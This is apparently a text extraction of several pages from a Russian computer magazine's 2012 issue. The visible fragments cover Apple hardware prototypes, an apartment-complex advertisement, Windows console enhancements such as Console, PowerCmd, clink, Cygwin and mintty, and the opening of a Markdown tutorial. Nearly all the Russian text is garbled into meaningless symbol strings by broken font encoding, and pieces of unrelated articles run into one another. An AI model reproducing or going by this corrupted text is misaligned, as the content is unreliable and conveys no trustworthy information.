z: H&*&/ 53&*,-0 I,(7 J4$@5 )& +5.&% :8#$);(,- *8@$,+ )8/ ,&%&7(:$*$3 )$7$1$ .$#$%&)(=. A8# 7" /+38&,& — ;,$ .$%+-;(,5= (: <,$? (/&( ( #8# @+/&, 7"1%=/&,- )$7"? .*$/+#,? K),&1*8'(= 5 iOS, :8.+5# (1* )8 @$%-E$3 <#*8)& (%( ;,$-,$ @$%-E&&?J. A.: R)! R#$+/ 2' . C1)$5. S1+ *)4+$8., :$# 2?7+$ 8,+$#7%#71'9 $+/+,%C#" 8 iOS % ?&"),-/+1%+- 3+"+C Siri. Apple ?4+ 7#-%1%"?+$ 1) "'1*+ -?C'*% % 8#$#,'; $+/+>#1#,, 1# &#*) 1+ 7#2")/)85 7# "'1*) $+/+,%C#"#, % 7#-)D1%; ")C,/+3+1%9. O 1)7+685, #1) 7#25+$8. ?8&+;), ) . &#/?3? , *#//+*0%6 &)"#3*? 1#,'; &"#-$#$%&#,, ,'8*#/5C1?,D%; 1) ,#/6 %C .2/#31'; /)2#")$#"%9.

z: 6,$ (: 8#,+8%-)"> .*$/+#,$7 Apple ()& .*$,$,(.$7) 7" (5.$%-:+&,&? K%(, 3$4&, @",-, /84& .$%-:+&,&5- ;&3-,$ (: 57$&? #$%-%&#'(( .*$,$,(.$7?J. A.: M7%18$,+11'9 &"#$#$%&, *#$#"'- . &#/5C?685, — :$# PowerMac G4 Tower. T8-&#/5C?6 +=# *)* 7#-)D1%9 8+",+" 7/. -?C'*% % >%/5-#,. I #8$)/51#- . 8$)")685 &#*?&)$5 &#8/+71%+ 1#,%1*% #$ Apple: 17" MacBook Pro 7/. 7#-) % ")2#$', &)") Apple TV, iPhone 4S % iPad 2.

K#$#=")>%% &?2/%*?6$8. 8 ")C"+D+1%. Jim Abeles, Pre1 Software.

N)8$5 >#$#=")>%9 &?2/%*?+$8. 8 ")C"+D+-1%. Bruce Damer, DigiBarn Computer Museum

(digibarn.com/collections/index.html).U,$#" >#$#=")>%9 &"#$#$%&) iPad —

&#/5C#,)$+/5 aaps69 8 eBay.

!"#$% 09 /164/ 2012

F8 3$3&), )8.(58)(= 5,8,-(, Jim Abeles *8@$,8% 7 57$&? 2(*3&, #$,$*+0 13 %&, )8:8/ $5)$78%. L )8 3$3&), 5/8;( && 7 .&;8,- $)... +E&% (: 2(*3" ( ,&.&*- *8@$,8&, $2('&*$3 .$%('((

PC ZONE

!"#$% 09 /164/ 2012040

Apple Newton Bic!"# $%&' ()* ') +,-& . /$0%)'&1 iPad — 1994 *$%. 2/# #"# /$ /-&3,/$4, 5/# #"# /$ /4#''64& &/-$7'&.)4& +&-)'&8. 24#/-$ Smart Cover — .$9)'6: 7#;$3.

Apple Interactive Television<=$-$-&+ >-$: +=&/-)5.& %38 +=$/4$-=) ?2 %$/-)-$7'$ 4)//$5$ -#/-&=$5)3& 5 @AB & !5=$+# 5 1994—1995 *$%);. 2 &-$*# #*$ C6/-=$ /5#=',3&, & /#:7)/ 4'$*&# +=$%)1- /5$& +=$--$-&+6 7#=#0 eBay. D/-=$:/-5$ +$3,7&3$ =)0-5&-&# -$3E.$ 5 2007 *$%, & 5 ')/-$8"## 5=#48 +=$%)#-/8 +$% ')05)'&#4 Apple TV.

Apple Cadillac<=$-$-&+ 5 +=$0=)7'$4 .$=+,/#. F-$ /#:7)/ Apple 0)'&4)#- 3&%&=,1"&# +$0&G&& 5 /#.-$=# 4$C&3E'6; ,/-=$:/-5, ) 5#%E .$*%)--$ $') -$3E.$ ')7&')3) >./+#=&4#'-&=$-5)-E 5 >-$: $C3)/-&. <=$-$-&+ %)-&=$5)' 1992 *$%$4 — 5 >-$ 5=#48 H9$C/ '# =)C$-)3 5 Apple & =)0=)C$-.) ,/-=$:/-5 (3) C#0 #*$ ,7)/-&8. I4#''$ +$>-$4, 4$9'$ 0)4#-&-E ') .$=+,/# Cadillac +=$=#0E %38 /-&3,/) — H9$C/ &; ') %,; '# +#=#'$/&3. H) & /J#4'6# )..,4,38-$=6 ') 4$C&3E'6; ,/-=$:/-5); +=& '#4 /3$9'$ 5/+$4'&-E.

Apple W.A.L.T. (Wizzy Active Lifestyle Telephone)K7#=#%'$: >./+#=&4#'- /=#%& >3#.-=$''6; ,/-=$:/-5. Apple 5+#=56# +=$%#4$'/-=&=$5)3) #*$ ') Macworld Boston 5 1993 *$%,, '$ -). '&.$*%) & '# 56+,/-&3) 5 +=$%)9,. <$ &%##, #*$ ',9'$ C63$ +$%.317)-E . -#3#-L$''$: 3&'&& & &/+$3E0$5)-E 5 =$3& «,4'$*$» -#3#L$'). K+8-E 9# +$%-=)0,4#5)3$/E ,+=)53#'&# +=& +$4$"& /-&3,/).

Apple iPhone 2G

!"#$#$%&' #$ Apple

!"#$% 09 /164/ 2012 041

iPad!"#$#$%& &(")#*# iPad, +#$#"', )-(./&-# )0&1'1 )(0-#, 2$#*# *#3/ -/ eBay. 40$"#,0$)# &#0$/)151#06 7(. /++89815$#"/, 3/ % )-(:-%, )%3 01(*+/ #$1%;/105 #$ <%-/16-#*# )/"%/-$/. =1/)-/5 #0#7(--#0$6 — 8 &1/-:($/ 7'1# 0"/.8 3)/ &#"$/ 315 ./"53+% — #3%-, +1/00%;(0+%,, 0-%.8 % (>( #3%- 07#+8. ?#*%+/ $/+#*# "(:(--%5 3#)#16-# &"#0$/5 — 80$"#,0$)# 9#@-# ./-"5@/$6 % ) *#"%.#-$/16-#9 % ) )("$%+/16-#9 &#1#@(-%% $/+, ;$#7' &"#)#3 -( 9(:/1 "8+/9.

A9(0$# .-/+#9#, iOS 9' )%3%9 -/ 2+"/-( $(0$#)8B &"#:%)+8 315 &"#)("+% )0(C <8-+-D%, 80$"#,0$)/.

!"#$#$%& -/:(1 0)#(*# -#)#*# )1/3(16D/ ./ 10 200 3#11/"#).

Apple Paladin!"#$#$%& #<%0-#, 9(;$'. A -(9 0#7"/1% &"/+-$%;(0+% )0( — $(1(<#-, </+0, +#&%" % 3/@( +#9&6B$(". A-(:-55 +1/)%/$8"/ 0 $"(+7#1#9 — ) +#9&1(+$(.

Apple PowerBook 5300E/ +#"&80( 9#@-# ./9($%$6 &#9($+% «&"#$#$%&», / 0/9 -#8$78+ ) $#$ 9#9(-$ -/.')/105 «PowerBook XXXX».

MikoMiko — 2$# 0#)9(0$-/5 "/."/7#$+/ Apple % King. F( -/.)/-%( — 0#+"/>(-%( #$ MacInsideKingOutside. G.#7"/@(--#( -/ +/"$%-+( 80$"#,0$)# — 2$# &"#$#$%& $("9%-/-1/ )"#3( &1/$(@-'C Qiwi, +#$#"'( 0(,;/0 0$#5$ &"/+$%;(0+% ) +/@3#9 9/*/.%-(.

E/1%;%( $/;0+"%-/, &#1-#D(--/5 #&("/D%#--/5 0%0$(9/ Mac OS % -(#7';-/5 )(7-+/9("/ ./ &"(3(1/9% +#"&80/ — )#$ (( *1/)-'( #0#7(--#0$%. F01% 8;(0$6, ;$# 0(,;/0 Apple &#0$(&(--# 0+"(>%)/($ Mac OS % iOS, $# 8&"/)1(-%( Mac OS &"% &#9#>% &/16D() 0+#"# 0-#)/ 9#@($ 0$/$6 "(/16-#0$6B.

!"#$%$&'%( )4 *%$%+& #%$%,-.& – /0% 1203 (%.45 6%.$-!-((45 !(%*%/0&7(45 8+&("' 6 1%+8-!(4!" &.0%60%2(#&!". %9:&2 1,%:&+3 +%!%. – 140 000;#..!., 1-$.4- /0&7" 9<+<0 %0.-+-(4 +,2 %9=-#0%. 6%>"&,3(%;– 940%.%*% (&8(&?-("2: !&*&8"(4, &10-#", 1$-+1$"20"2 940&, !-+">"(6#"- <?$-7+-("2.

+%1%,("0-,3(<@ "(A%$!&>"@ % 1$%+&7- #.&$0"$ . 7# «(& .46%0-» !%7(% 1%,<?"03 . %A"6- 1$%+&7 #%!1&("" «!%(%,"0 1,@6»

"1%0-#&«!"#"$%& '$()» *+&%,#" -*."&*/& ) ,/01-2%3% .*#+*3% '" '-"4-*33*3 %'"&/5#"4" +-/0%&",*#%6. 7)"."/ ,#%3*#%/ 10/$6/&)6 '-*,","8 9*2%2/##")&% +$%/#&",, '-%".--/&*&/$/8 :%$;6 % #/:%$<= '"3/2/#%8.

Ñæëìáíá

!"#$%$&'%( )4 – *+%*$&,"-+.#"' /+(0$ *. 1%$%234&. 50$%"0+26.04% 7%8%4 4+730.9 :% "(7"4"7;&26(%8; :$%+#0;. < =&*%4%' 7%.0;:(%.0" %0 7&((%*% &7$+.& (&>%7"0.9 *":+$8&$#+0? " .;:+$8&$#+0? "@4+.0(?> A$+(7%4 (B+$+#$3.0%#, 1%4-+* " 0.7.), & 0&# C+ :$+7:$"90"9 .,+$ ;.2;*, 7%.;*%4?+ /+(0$? (#&,+, $+.0%$&(?), " /+(0$&26(?' D%8 #;260;$?.

EC+ 7&4(% 1%$%2+4 "8++0 .2&4; *%$%7&, *7+ 8%C(% :%-2;-"06 %-+(6 #&-+.04+((%+ %A$&@%4&("+: %A"2"+ .:+/"&-2"@"$%4&((?> =#%2, 04%$-+-.#"> /+(0$%4 " =#%2 ".#;..04, A%*&0?+ ,%(7? A"A2"%0+#, "@4+.0(?+ <;@? 4 -+$0+ *%$%7& – 4.+ F0% %:$+7+29+0 &08%.,+$; (&;-(%' .%.$+-7%0%-+((%.0" " 04%$-+.04& *%$%C&(.

D%A$&06.9 7% *%$%7& " C"2%*% #%8:2+#.& «G& 4?.%0+» 8%C(% %0 8. <DGH (& 8&$=$;0(%8 0&#." ) 392 "2" . I$%.2&4.#%*% 4%#@&2& (& :$"*%$%7(%' F2+#0$"-#+ 7% .0. J%2=+4%. <$+89 4 :;0" (& .#%$%.0(%' F2+#0$"-#+ «5:;0("#» 7% .0&(/"" 8+0$% «1%8.%8%26.#&9» @&("8&+0 4.+*% 25 8"(;0.

!"#$"%#$&' "()&#*+, ,. $"-").%, /-".01 !&$&-.2$", 1. 1 (495) 516-40-04

$"!/&23' «!"2")3* /)4#» (%5"13* % #"#*&% ,-6//7 $"!/&238 «!"2")3*») /-.1#*&%)'.* 93)"8 $"!/).$# «2& %7#"*.», -&#/")"9.2278 /-&$*3:.#$3 % ;.2*-&)+2"8 :&#*3 ,"-"1& $"-").%& – !$-.4 % ,-&23;&5 6). !&*-"#"%&, 6). #*-"3*.).8, 6). 1.$&(-3#*"%.

C :%7$%A(?8" .>+8&8" :2&("$%4%# #4&$0"$ " :$%+#0(%' 7+#2&$&/"+' 8%C(% %@(&#%8"06.9 (& .&'0+ www.gk-monolit.ru

!"#$% 09 /164/ 2012044

&'()* + ,-).-/'WINDOWS

PC ZONE !"#$% «Mifrill» &'(')*+" (mifrill@real.xakep.ru)

!"#$% &$'()* — '(+)#+,()+- ./%+)#)+- '(,/.+ Windows )$"#/0)+. 1 )$2 )$( )/,%+34)/5/ copy-paste, )$( 6.3+#/. 7 #+8$ )$( 6/9%/8)/'(7 :/-&$3/6$&$'.7 :/%$)-(4 ,+9%$, /.)+. ;,/%$ (/5/, 6 '+%/2 Windows %+3/6+(/ ./)'/34)*< 7)'(,"%$)(/6, 7 3=07($37 ($.'(/6/5/ ,$87%+, 6/9%/8)/, 9+</(-(

:/3"&7(4 #/'(": . %/>)/%" /.,"8$)7= UNIX. ?3- @(/5/ (/8$ $'(4 '6/7 ,$A$)7-.

!"#$%&'( ')* CMD.EXE + !),-%$.!-+/(

!"#$% & '($)(*" Windows

!"#$% 09 /164/ 2012 045

Console — !"#$%&'(&) * $+,-./&((&) -, /"%,0"1 &%2'"+(&'*3& +,-(,1 4,(#,%* 5, #+&3("(*6 # Console, PowerCmd */""' /(,7"#'3, -,$,%(*'"%2(89 $%6:"4

icrosoft $+ )"*%$( #,-(.". )/0%-, '(1,$0$(2 ).3('". 4$( " 5($6.$(: 0*6 -(*%7"$).&, *80+2 9.( )(&+37+$$( -+)5(*+#-$,6 :,).% )").+1;. < ):,).%8, +).% 9$./#",).;, $+ 5(*+-

$"&7"+)6 53+&3,.".% ).,$0,.$;2 cmd.exe & "$).3/1+$., '(.(3;2 0+2).&".+*%$( 1(=$( ")5(*%#(&,.%.

CONSOLE sourceforge.net/projects/console>5+3&, 3,))1(.3"1 3+7+$"6 0*6 .+?, '.( &;="&,+. 5(0 '(1,$0$(2 ).3('(2 Windows, $( 53" 9.(1 $+ ")5;.;&,+. $/=0; )&6#;&,.%)6 ) &"3./,*"#,@"+2 "*" *nix-/."*".,1", , A*,&$(+ — $+ =+*,+. 5*,-.".%! >*(&(1, $,:$+1 ) ),1(A( 53().(A( " 0()./5$(A(.

B3(+'. ) $+#,1;)*(&,.;1 $,#&,$"+1 Console, 5(=,*/2, ),1,6 '3/.,6 " C/$'@"($,*%$,6 3,#3,-(.', 0*6 (5."1"#,@"" cmd & Windows $, 0,$$;2 1(1+$.. D (.*":"+ (. 3(0$(2 (-(*(:'" )").+-1;, Console 53"#&,$, -;.% /0(-$(2, 5($6.$(2 " 53+0/)1,.3"&,+. &)+ .+ 1+*(:", '(.(3;? 1$(A"1 .,' $+ ?&,.,+., $,53"1+3, 5()*+ 3,-(.; ) Linux "*" Mac.

E,A*60$++ &)+A( -/0+. 53().( 5+3+:")*".% '*8:+&;+ C"7'" )(C."$;:• F(=$( )(#0,&,.% 1$(=+).&( &'*,0(' '(1,$0$(2 ).3('" & (0$(1

('$+, ) "$0"',@"+2 ,'."&$()." C($(&(2 &'*,0'".• F(=$( $, *+./ "#1+$6.% 3,#1+3 ('$,, ',' ?(:+.)6, .+'). -/0+.

,&.(1,.":+)'" 5(0A($6.%)6 5(0 $(&;2 3,#1+3.• G1++.)6 C/$'@"6 copy-paste, , #$,:"., 1(=$( )5('(2$( '(5"5,-

).".% "$C(31,@"8 ./0,-)80,, ',' & (-;:$(1 .+').(&(1 3+0,'-.(3+ (&;0+*".% 1;7%8 $/=$;2 C3,A1+$. 1(=$(, #,=,& '*,&"7/ <Shift>, , &).,&".% — :+3+# ./*-,3 "*" :+3+# 1+$8).

• H).% &(#1(=$().% &;-"3,.% *8-(2 "# 0()./5$;? 0*6 '($)(*" 73"C.(& " $,).3(".% "? )A*,="&,$"+ &5*(.% 0( ClearType.

• F(=$( #,5(1"$,.% 3,#1+3 ('$, " 5(#"@"8 $, 9'3,$+ — 53" ',=0(1 #,5/)'+ '($C"A/3,@"6 -/0+. .,, :.( $/=$, 5(*%#(&,.+*8. B3(#3,:$().% ('$, .,'=+ "1++.)6 " $,).3,"&,+.)6, $( 3+,*"#(-&,$, ).3,$$( — &( 1$(A"? )*/:,6? .+'). ).,$(&".)6 $+:".,+1;1.

• I,-(.,8. &)+&(#1(=$;+ '(1-"$,@"" '*,&"7, '(.(3;+ 1(=$( $,).3(".% 5(0 )+-6.

• F(=$( )(#0,&,.% 53+0$,).3(+$$;+ &'*,0'" " 53(5");&,.% '(1--"$,@"" '(1,$0, '(.(3;+ -/0/. &;5(*$+$; 53" (.'3;."" 0,$$(2 &'*,0'".

• H).% &(#1(=$().% 5(0'*8:+$"6 03/A"? "$.+353+.,.(3(& (bash " 53(:"+) — , #$,:"., " #,5/)',.% )@+$,3"" $, 9."? 6#;',?.

I,#/1++.)6, 9.( 0,*+'( $+ 5(*$;2 5+3+:+$% .(A(, :.( /1++. Console, $( ().,*%$;+ $8,$); */:7+ 5(#$,&,.% $, 0+*+, .+1 -(*++ :.( 53(A3,11, 3,)53().3,$6+.)6 )&(-(0$( " )(&+37+$$( -+)-

5*,.$(. J,1+."1, :.(, 5(3,-(.,& ) Console ?(.6 -; 3,#, /=+ )*(=$( 53+0).,&".% )+-+ 3,-(./ -+# $++. < )(=,*+$"8, $+'(.(3;+ 5(*%#(-&,.+*" =,*/8.)6 $, )'(3().% 3,-(.; 53(A3,11;.

<).,.", 0*6 .+?, '.( -(*%7+ 0(&+36+. 5*,.$;1 " )+3%+#$;1 3+7+$"61, +).% (:+$% 5(?(=,6 $, Console ,*%.+3$,."&, — PowerCmd (powercmd.com). B( C/$'@"($,*%$()." Console " PowerCmd )?(=", .(*%'( / 5()*+0$+2 3,#*":$;? «)&").+*('» " /0(-).& +K+ -(*%7+: • >"*%$,6 ).(3($, — &(#1(=$().% 3,)5(*,A,.% '($)(*" $+ .(*%'(

& &"0+ &'*,0(', $( " & &"0+ (-*,).+2 (0$(A( 9'3,$,. B3" 9.(1 1(=$( 3,#1+).".% 0( :+.;3+? .+31"$,*(&.

• F(=$( &+)." *(A" &&(0"1;? '(1,$0, ")',.% 5( $"1.• F(=$( #,5(1"$,.% 5/." " 5,5'" & &"0+ "#-3,$$(A( ) #,$+)+$"+1 &

"#-3,$$;+ #,'*,0'".• B3+0/)1(.3+$; 3,#*":$;+ $,).3(2'" "$.+3C+2),: 1+$6+.)6 C($,

"#1+$68.)6 73"C.;, $/1+3/8.)6 ).3('".• B(00+3="&,+.)6 ,&.(0(5(*$+$"+.• L()./5$, 5(0)&+.', )"$.,')"),.• H).% &(#1(=$().% #,5(1"$,.% ,'."&$;+ )+))"".

40$(#$,:$( (53,&0,.% @+$$"' & 30 0(**,3(& / PowerCmd 6 $+ 1(A/ — 53" =+*,$"" Console 1(=$( 3,)7"3".% 0( $/=$(A( /3(&$6, 0, " /5"3,+.)6 &)+ & '($+:$(1 ):+.+ & '($'3+.$;+ 5(.3+-$()." 5(*%#(&,.+*6.

CLINK code.google.com/p/clink< ),1;1 53().;1 ,5A3+20,1 1(=$( (.$+)." +K+ (0"$ )(&)+1 1,*+$%'"2 ?,' — Open Source /."*"./ clink, '(.(3,6 )5()(-$, #$,:".+*%$( 3,)7"3".% &(#1(=$()." "$.+353+.,.(3, '(1,$0-$(2 ).3('" cmd.exe. L+*( & .(1, :.( clink ")5(*%#/+. -"-*"(.+'/

M!"#$" %"&'()(*+ ,-.'-$(%*-".$$/. )01('02 2 ,-",2%/)(*+ 0"!32$(422 0"!($', 0"*"-/. 35'5* )/-,"1$.$/ ,-2 26 "*0-/*22

PC ZONE

!"#$% 09 /164/ 2012046

!"#$!%, &'(#)** copy-paste, (%$!+,"# -+,.+%/(,$!* ,#(% * !%# 0%1"". 2 .(%/*!, ('3(% (,4%5 -+,6+%77%-!"+7*(%1. Mintty — ,0(, *. $%789 -,-'15+(89 * '0,:(89 +";"(*< 4 =!,< ,:1%$!*.

Mintty, !%# 3" #%# * Console, , #,!,+,< +"/> ;1% 4 (%/%1", -+*-.4%(% ,-!*7*.*+,4%!> +%:,!' #,7%(0(,< $!+,#*. ?'(#)*,(%1>-(,$!> =!*9 04'9 $,&!*( 4"$>7% $9,3%, -+%40%, mintty, # $,3%1"(*@, (" -,00"+3*4%"! !%:8. A$1* 3" (%1*/*" *1* ,!$'!$!4*" 4#1%0,# ("#+*!*/(,, (% mintty !,/(, $!,*! ,:+%!*!> 4(*7%(*", -,!,7' /!, ,(% -+"0,$!%415"!:• '0,:(8< copy-past;• &'(#)*@ drag & drop 015 !"#$!%, &%<1,4 *1* 0*+"#!,+*<;• 4,.7,3(,$!> ,!#+84%!> $$81#* -, <Ctrl>+#1*#;• -,1(,=#+%((8< +"3*7 * -+,.+%/(,$!> 015 Windows Vista * 7;• -,00"+3#' +%.1*/(89 #,0*+,4,#, 4#1@/%5 UTF-8,

% !%#3" 7(,6,", 7(,6," 0+'6,". z

readline, #,!,+%5 $,.0%(% * -,00"+3*4%"!$5 4 +%7#%9 -+,"#!% GNU * ,:"$-"/*4%"! *(!"+&"<$ #,7%(0(,< $!+,#* * ,:+%:,!#' $!+,# 4 bash.

B,$1" '$!%(,4#* clink *(!"+-+"!%!,+ cmd.exe &%#!*/"$#* 4"0"! $":5 #%# #,7%(0(%5 ,:,1,/#% bash $, 4$"7* "" -+,04*('-!87* &'(#)*57*: %4!,0,-,1("(*"7 #,7%(0(,< $!+,#*, +"0%#!*-+,4%(*"7, *$!,+*"< #,7%(0 * !%# 0%1"". B"+"/*$15!> 4"$> $-*$,# (,489 4,.7,3(,$!"< cmd (" $!%(', -+*4"0' !,1>#, ("#,!,+8" ,$,:"((,$!*:• '0,:(," %4!,0,-,1("(*" -'!"< ((%3%!*"7 <TAB>);• 4$!%4#% *. :'&"+% ,:7"(% (-, $!%(0%+!(,7' 9,!#"@: <Ctrl>-V);• -,00"+3#% %4!,0,-,1("(*5 -+* '#%.%(** *$-,1(5"789 &%<1,4/

#,7%(0 * -"+"7"((89 ,#+'3"(*5;• &'(#)** Undo/Redo (<Ctrl>-_ *1* <Ctrl>-X, <Ctrl>-U);• '1'/;"((%5 *$!,+*5 #,7%(0(,< $!+,#*;• $,9+%("(*" -+"080'C*9 $"$$*<;• -,*$# -, *$!,+** (<Ctrl>-R * <Ctrl>-S);• +%$;*+"((%5 *$!,+*5 ((%-+*7"+, !!, !<string< * !$);• $#+*-!8 %4!,0,-,1("(*5 (% Lua, -,.4,15@C*" $"+>".(, $=#,(,-

7*!> 4+"75.

CYGWIN cygwin.comD' * 4 .%#1@/"(*" 9,!"1,$> :8 (%-,7(*!> !":" , "C" ,0(,7 -,1".("<;"7 *($!+'7"(!", 9,!5 "6, * ("1>.5 (%.4%!> «-+,$!,< ,-!*7*.%)*"< cmd». E%((," +";"(*" -+*6,0*!$5 !"7, #!, 3"1%"! ,:F"0*(*!> 4,.7,3(,$!* Linux * Windows, *1* !"7, #!, -, #%#*7-!, -+*/*(%7 (" 7,3"! '$!%(,4*!> Linux (% $4,"7 #,7-", (, 4 ("7 ('30%"!$5.

G,("/(,, :,1>;*($!4, (%;*9 /*!%!"1"< '3" 0,6%0%1*$>, , /"7 +"/>, 4"0> ,(* (%4"+(5#% .(%#,78 $, $!%+87 0,:+87 Cygwin, (, 4$-,7(*!> , ("7 "C" +%. — (" 1*;("".

Cygwin — =!, UNIX--,0,:(%5 $+"0% * *(!"+&"<$ #,7%(0(,< $!+,#* 015 Windows, -,.4,15@C%5 ,:F"0*(*!> Windows * UNIX :". *$-,1>.,4%(*5 4*+!'%1*.%)** (/!, ("7%1,4%3(,). B, $'!*, =!, (" /!, *(,", #%# (%:,+ '!*1*! *. 7*+% *nix, -,+!*+,4%((89 (% Windows. H!, #,(#+"!(, '$!%(%41*4%!> -,7*7, :%.,4,< $*$!"78, #%308< +";%"! $%7 015 $":5 — 48:,+ ,6+,7"(. D, !%# #%# 78 $"-6,0(5 .%(*7%"7$5 ,-!*7*.%)*"< #,7%(0(,< $!+,#*, (%$ *(!"+"$'-"! *7"((, =!,! %$-"#! Cygwin.

I ,:C"7-!,, Cygwin -+"4+%C%"! #,7%(0('@ $!+,#' 4 '0,:(8< UNIX-!"+7*(%1, # #%#,7' -+*48#1* -,#1,((*#* Linux * Mac. I$" UNIX-#,7%(08, #,!,+8" !":" .(%#,78, -+"#+%$(87 ,:+%.,7 :'0'! +%:,!%!> * .0"$>, !%# 3", #%# +%:,!%@! * 7(,6*" (*#$,-48" '!*1*!8. J0(%#, $%7% #,7%(0(%5 ,:,1,/#%, '48, ,$!%"!$5 -+%#!*/"$#* :". *.7"("(*<. Cygwin +";%"! -+,:1"7' ,!$'!$!4*5 #,7%(0 * $*(!%#$*$%, (, '0,:$!4, +%:,!8 4$" +%4(, ,$!%415"! 3"1%!> 1'/;"6,. K1"0'@C*< $,4"! -,7,3"! +%.,:+%!>$5 * $ =!,< .%0%/"<.

MINTTY code.google.com/p/minttyE$1* !8 *$-,1>.'";> Cygwin *1* MSYS/MinGW, !":" !,/(, -+*-6,0*!$5 mintty.

G%# 78 '3" 485$(*1*, /%C" 4$"6, 1@057 4 +%:,!" $ #,7%(0(,< $!+,#,< (" 94%!%"! $%7,6, =1"7"(!%+(,6,: '0,:(,6, 480"1"(*5

Cygwin ! "#$%&'(()* xclock + Midnight Commander

mintty — %,-.(#/ (#,!01-23#

CYGWIN !"#$"%&%#' ()*%+,-+-. /'")(- $ -,)0+12 UNIX-'#"*3+%4, ( (%()*- !"3$1(-43 !)(4)++3(3 LINUX 3 MAC

PC ZONE !"#$" %&'$( (antitster@gmail.com)

!"#$% 09 /164/ 2012048

!"#$%&'(). *+% Markdown

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

,(-%.'/01& 2#$13($45 )/6$ 3#/&1+$4 7.) (#&62 3#/"62 /#7#8

===========================================================

9.#" "# :.4;#5<41 10 &4"0+:

1. =#/%:3#+'() ( (4"+#$(4(%& Markdown.

2. >(+#"%?4+' -.#@4" 7.) +1$(+%?%@% 317#$+%3#.

3. !#&0+4+' :.%@ ( -%&%A'B Octopress, /#2%(+4? 1@% "# Github.

!"#$%&', (%$)*+, "-./+-01, 2$ 3"4%15*11 )/1,6 5%6 ,1*6 4-$%$ *1 .$.$6--" *")$6 -17*"%"(06 0%0 *")+' &5"8*+' 41/)04, $... 62+. /$2,1-.0. 9$2$%"4: 8+, ;-" 2514: ,"#1- 8+-: 3/0,1;$-1%:*"("? <"%:." 14%0 /1;: 051- *1 " Markdown. !/"4-$6 0516, .$. ,"#*" "="/,0-: -1.4- 0 3/1)/$-0-: 1(" ) )$%05*+' HTML, )+4-/1%0%$ *$4-"%:.", ;-" 043"%:2")$-: 1(" ,"#*" 3/$.-0;14.0 3")41,14-*". > 8%$("5$/6 3"3&%6/*"4-0 Markdown ) 7$.1/4.07 ./&($7, 3"6)0%46 1?1 0 4")1/@1**" *")+' 3"57"5 (0 41/)04+) . 3&8%0.$A00 ."*-1*-$, ) "4*")1 ."-"/"(" %1#$- 4-$-0;14.01 =$'%+.

!"#$%&'()* +,-)."-!/ 0'1- .,'*)2-! 3%0 ",*1+ .,'41+ ',3,5

MARKDOWN? B<C D<C? E1(;1 )41(" 4,+4% Markdown "8F64*0-: *$ 3/"4-1'@1, 3/0,1/1. G%6 4"4-$)%1*06 4304.$ 51% 6 043"%:2&H "8+;*+' -1.4-")+' =$'%, ) ."-"/", 30@&:

DZȣȜȥȢȞ Șșȟ:- ȡȔȣȜȥȔȦȰ ȥȦȔȦȰȲ Ȣ Markdown- ȥȘșȟȔȦȰ ȜȟȟȲȥȦȤȔȪȜȜ- ȢȦȣȤȔȖȜȦȰ Ȗ ȤșȘȔȞȪȜȲ

9$#5+' 02 *$4 &,11- "="/,%6-: 4%"#*+1 4-/&.-&/+ ) 3/"-4-", plain text’1, 0 ) I-", "4*")*"' 4,+4% Markdown. J$3/0,1/, 3/0)151**+' -1.4- ,"#*" 4/$2& 4."*)1/-0/")$-: ) HTML, 3/0 I-", 0*-1/3/1-$-"/ Markdown (4.$#1,, /1$%02")$**+' ) )051 3%$(0*$ . -1.4-")",& /15$.-"/& )/"51 SublimeText 0%0 Notepad++) 4$, /$4-3"2*$1-, ;-" 0,11- 51%" 4 *1*&,1/")$**+, 4304.",:

<p>DZȣȜȥȢȞ Șșȟ:</p>

!"#$%&'().&'( Markdown

!"#$%&'(). *+% Markdown

!"#$% 09 /164/ 2012 049

!"#$%&'()* + ,-./()* +(#'0,1"(' -%2 #.3-&(+2 4"/--.5,1"('.4 4 Mac OS X6.31.7(., #&1)* 8,(59+.(&%:()* 0"-&5'.0 -%2 Windows

<ul><li>ȡȔȣȜȥȔȦȰ ȥȦȔȦȰȲ ȣȤȢ Markdown</li><li>ȥȘșȟȔȦȰ ȜȟȟȲȥȦȤȔȪȜȜ</li><li>ȢȦȣȤȔȖȜȦȰ ȦșȞȥȦ Ȗ ȤșȘȔȞȪȜȲ</li></ul>

,#$ -./0+ (#& #1+%2 Markdown 34%" 526702, .80) )9:$# 1 +%&, ;+%7: (."+#$(.( 7:< "#(+%<'$% -2%(+, $%&-#$+0" . %;01.80", ;+% 2#9&0;0"":= 8%$6&0"+ %(+#1#<() 7: -%<"%(+'> ;.+#0&:& . "0-%-(1)?0"":= ;0<%10$ &%@ 7: 8#40 20/.+', ;+% -0208 ".& %7:;":= plain text. ,#$ Markdown 8%7.1#0+() +#$%@% 2096<'+#+#?

A%9'&0& ;6+' 7%<00 (<%4":= -2.&02. B208(+#1', ;+% +070 "64-"% %C%2&.+' "6&02%1#"":= (-.(%$. D;01.8"%, ;+% +: -%(+#1./' -0208 $#48:& -6"$+%& (%%+10+(+16>?.= "%&02. E64"% #$F0"-+.2%1#+' 1".&#".0 "# $#$.0-+% (<%1#? G: "#102")$# (80<#< H+% ( -%&%?'> $#$.I-+% (.&1%<%1.

# ǧȔȗȢȟȢȖȢȞ## ǯȢȘțȔȗȢȟȢȖȢȞ

Ǣ ȱȦȢȠ ȔȕțȔȪș ȡȧȚȡȢ:

1. ȫȦȢ-ȦȢ ȖȯȘșȟȜȦȰ **ȚȜȤȡȯȠ** Ȝ *ȞȧȤȥȜȖȢȠ*2. ȣȢȥȦȔȖȜȦȰ ȥȥȯȟȞȧ ȡȔ ȥȔȝȦ ȔȖȦȢȤȔ - [Daring Fireball] (http://daringfi reball.net)5. ȣȤȢȪȜȦȜȤȢȖȔȦȰ ȞȢȘ, ȡȔȣȤȜȠșȤ, 'print "Hello, world!"'3. Ȝ ȖȥȦȔȖȜȦȰ ȣȢȤȦȤșȦ ȔȖȦȢȤȔ


A H+%& -2.&020 I%2%/% 1.8"%, "#($%<'$% ;.+#70<'":& %(+#0+() +0$(+. J#$+.;0($. %;01.8"%@% 20/0".) "0 -2.86&#<. +%<'$% 8<) 1(+#1$. ((:<%$ . $#2+."%$, -<>( .9"#;#<'"% )9:$ "0 -%91%<)< %-2080<.+' &#(/+#7 .9%72#40".). A 2096<'+#+0 %72#7%+$. ."+02--20+#+%2%& "# 1:I%80 &: -%<6;#0& @%+%1:= $%8:

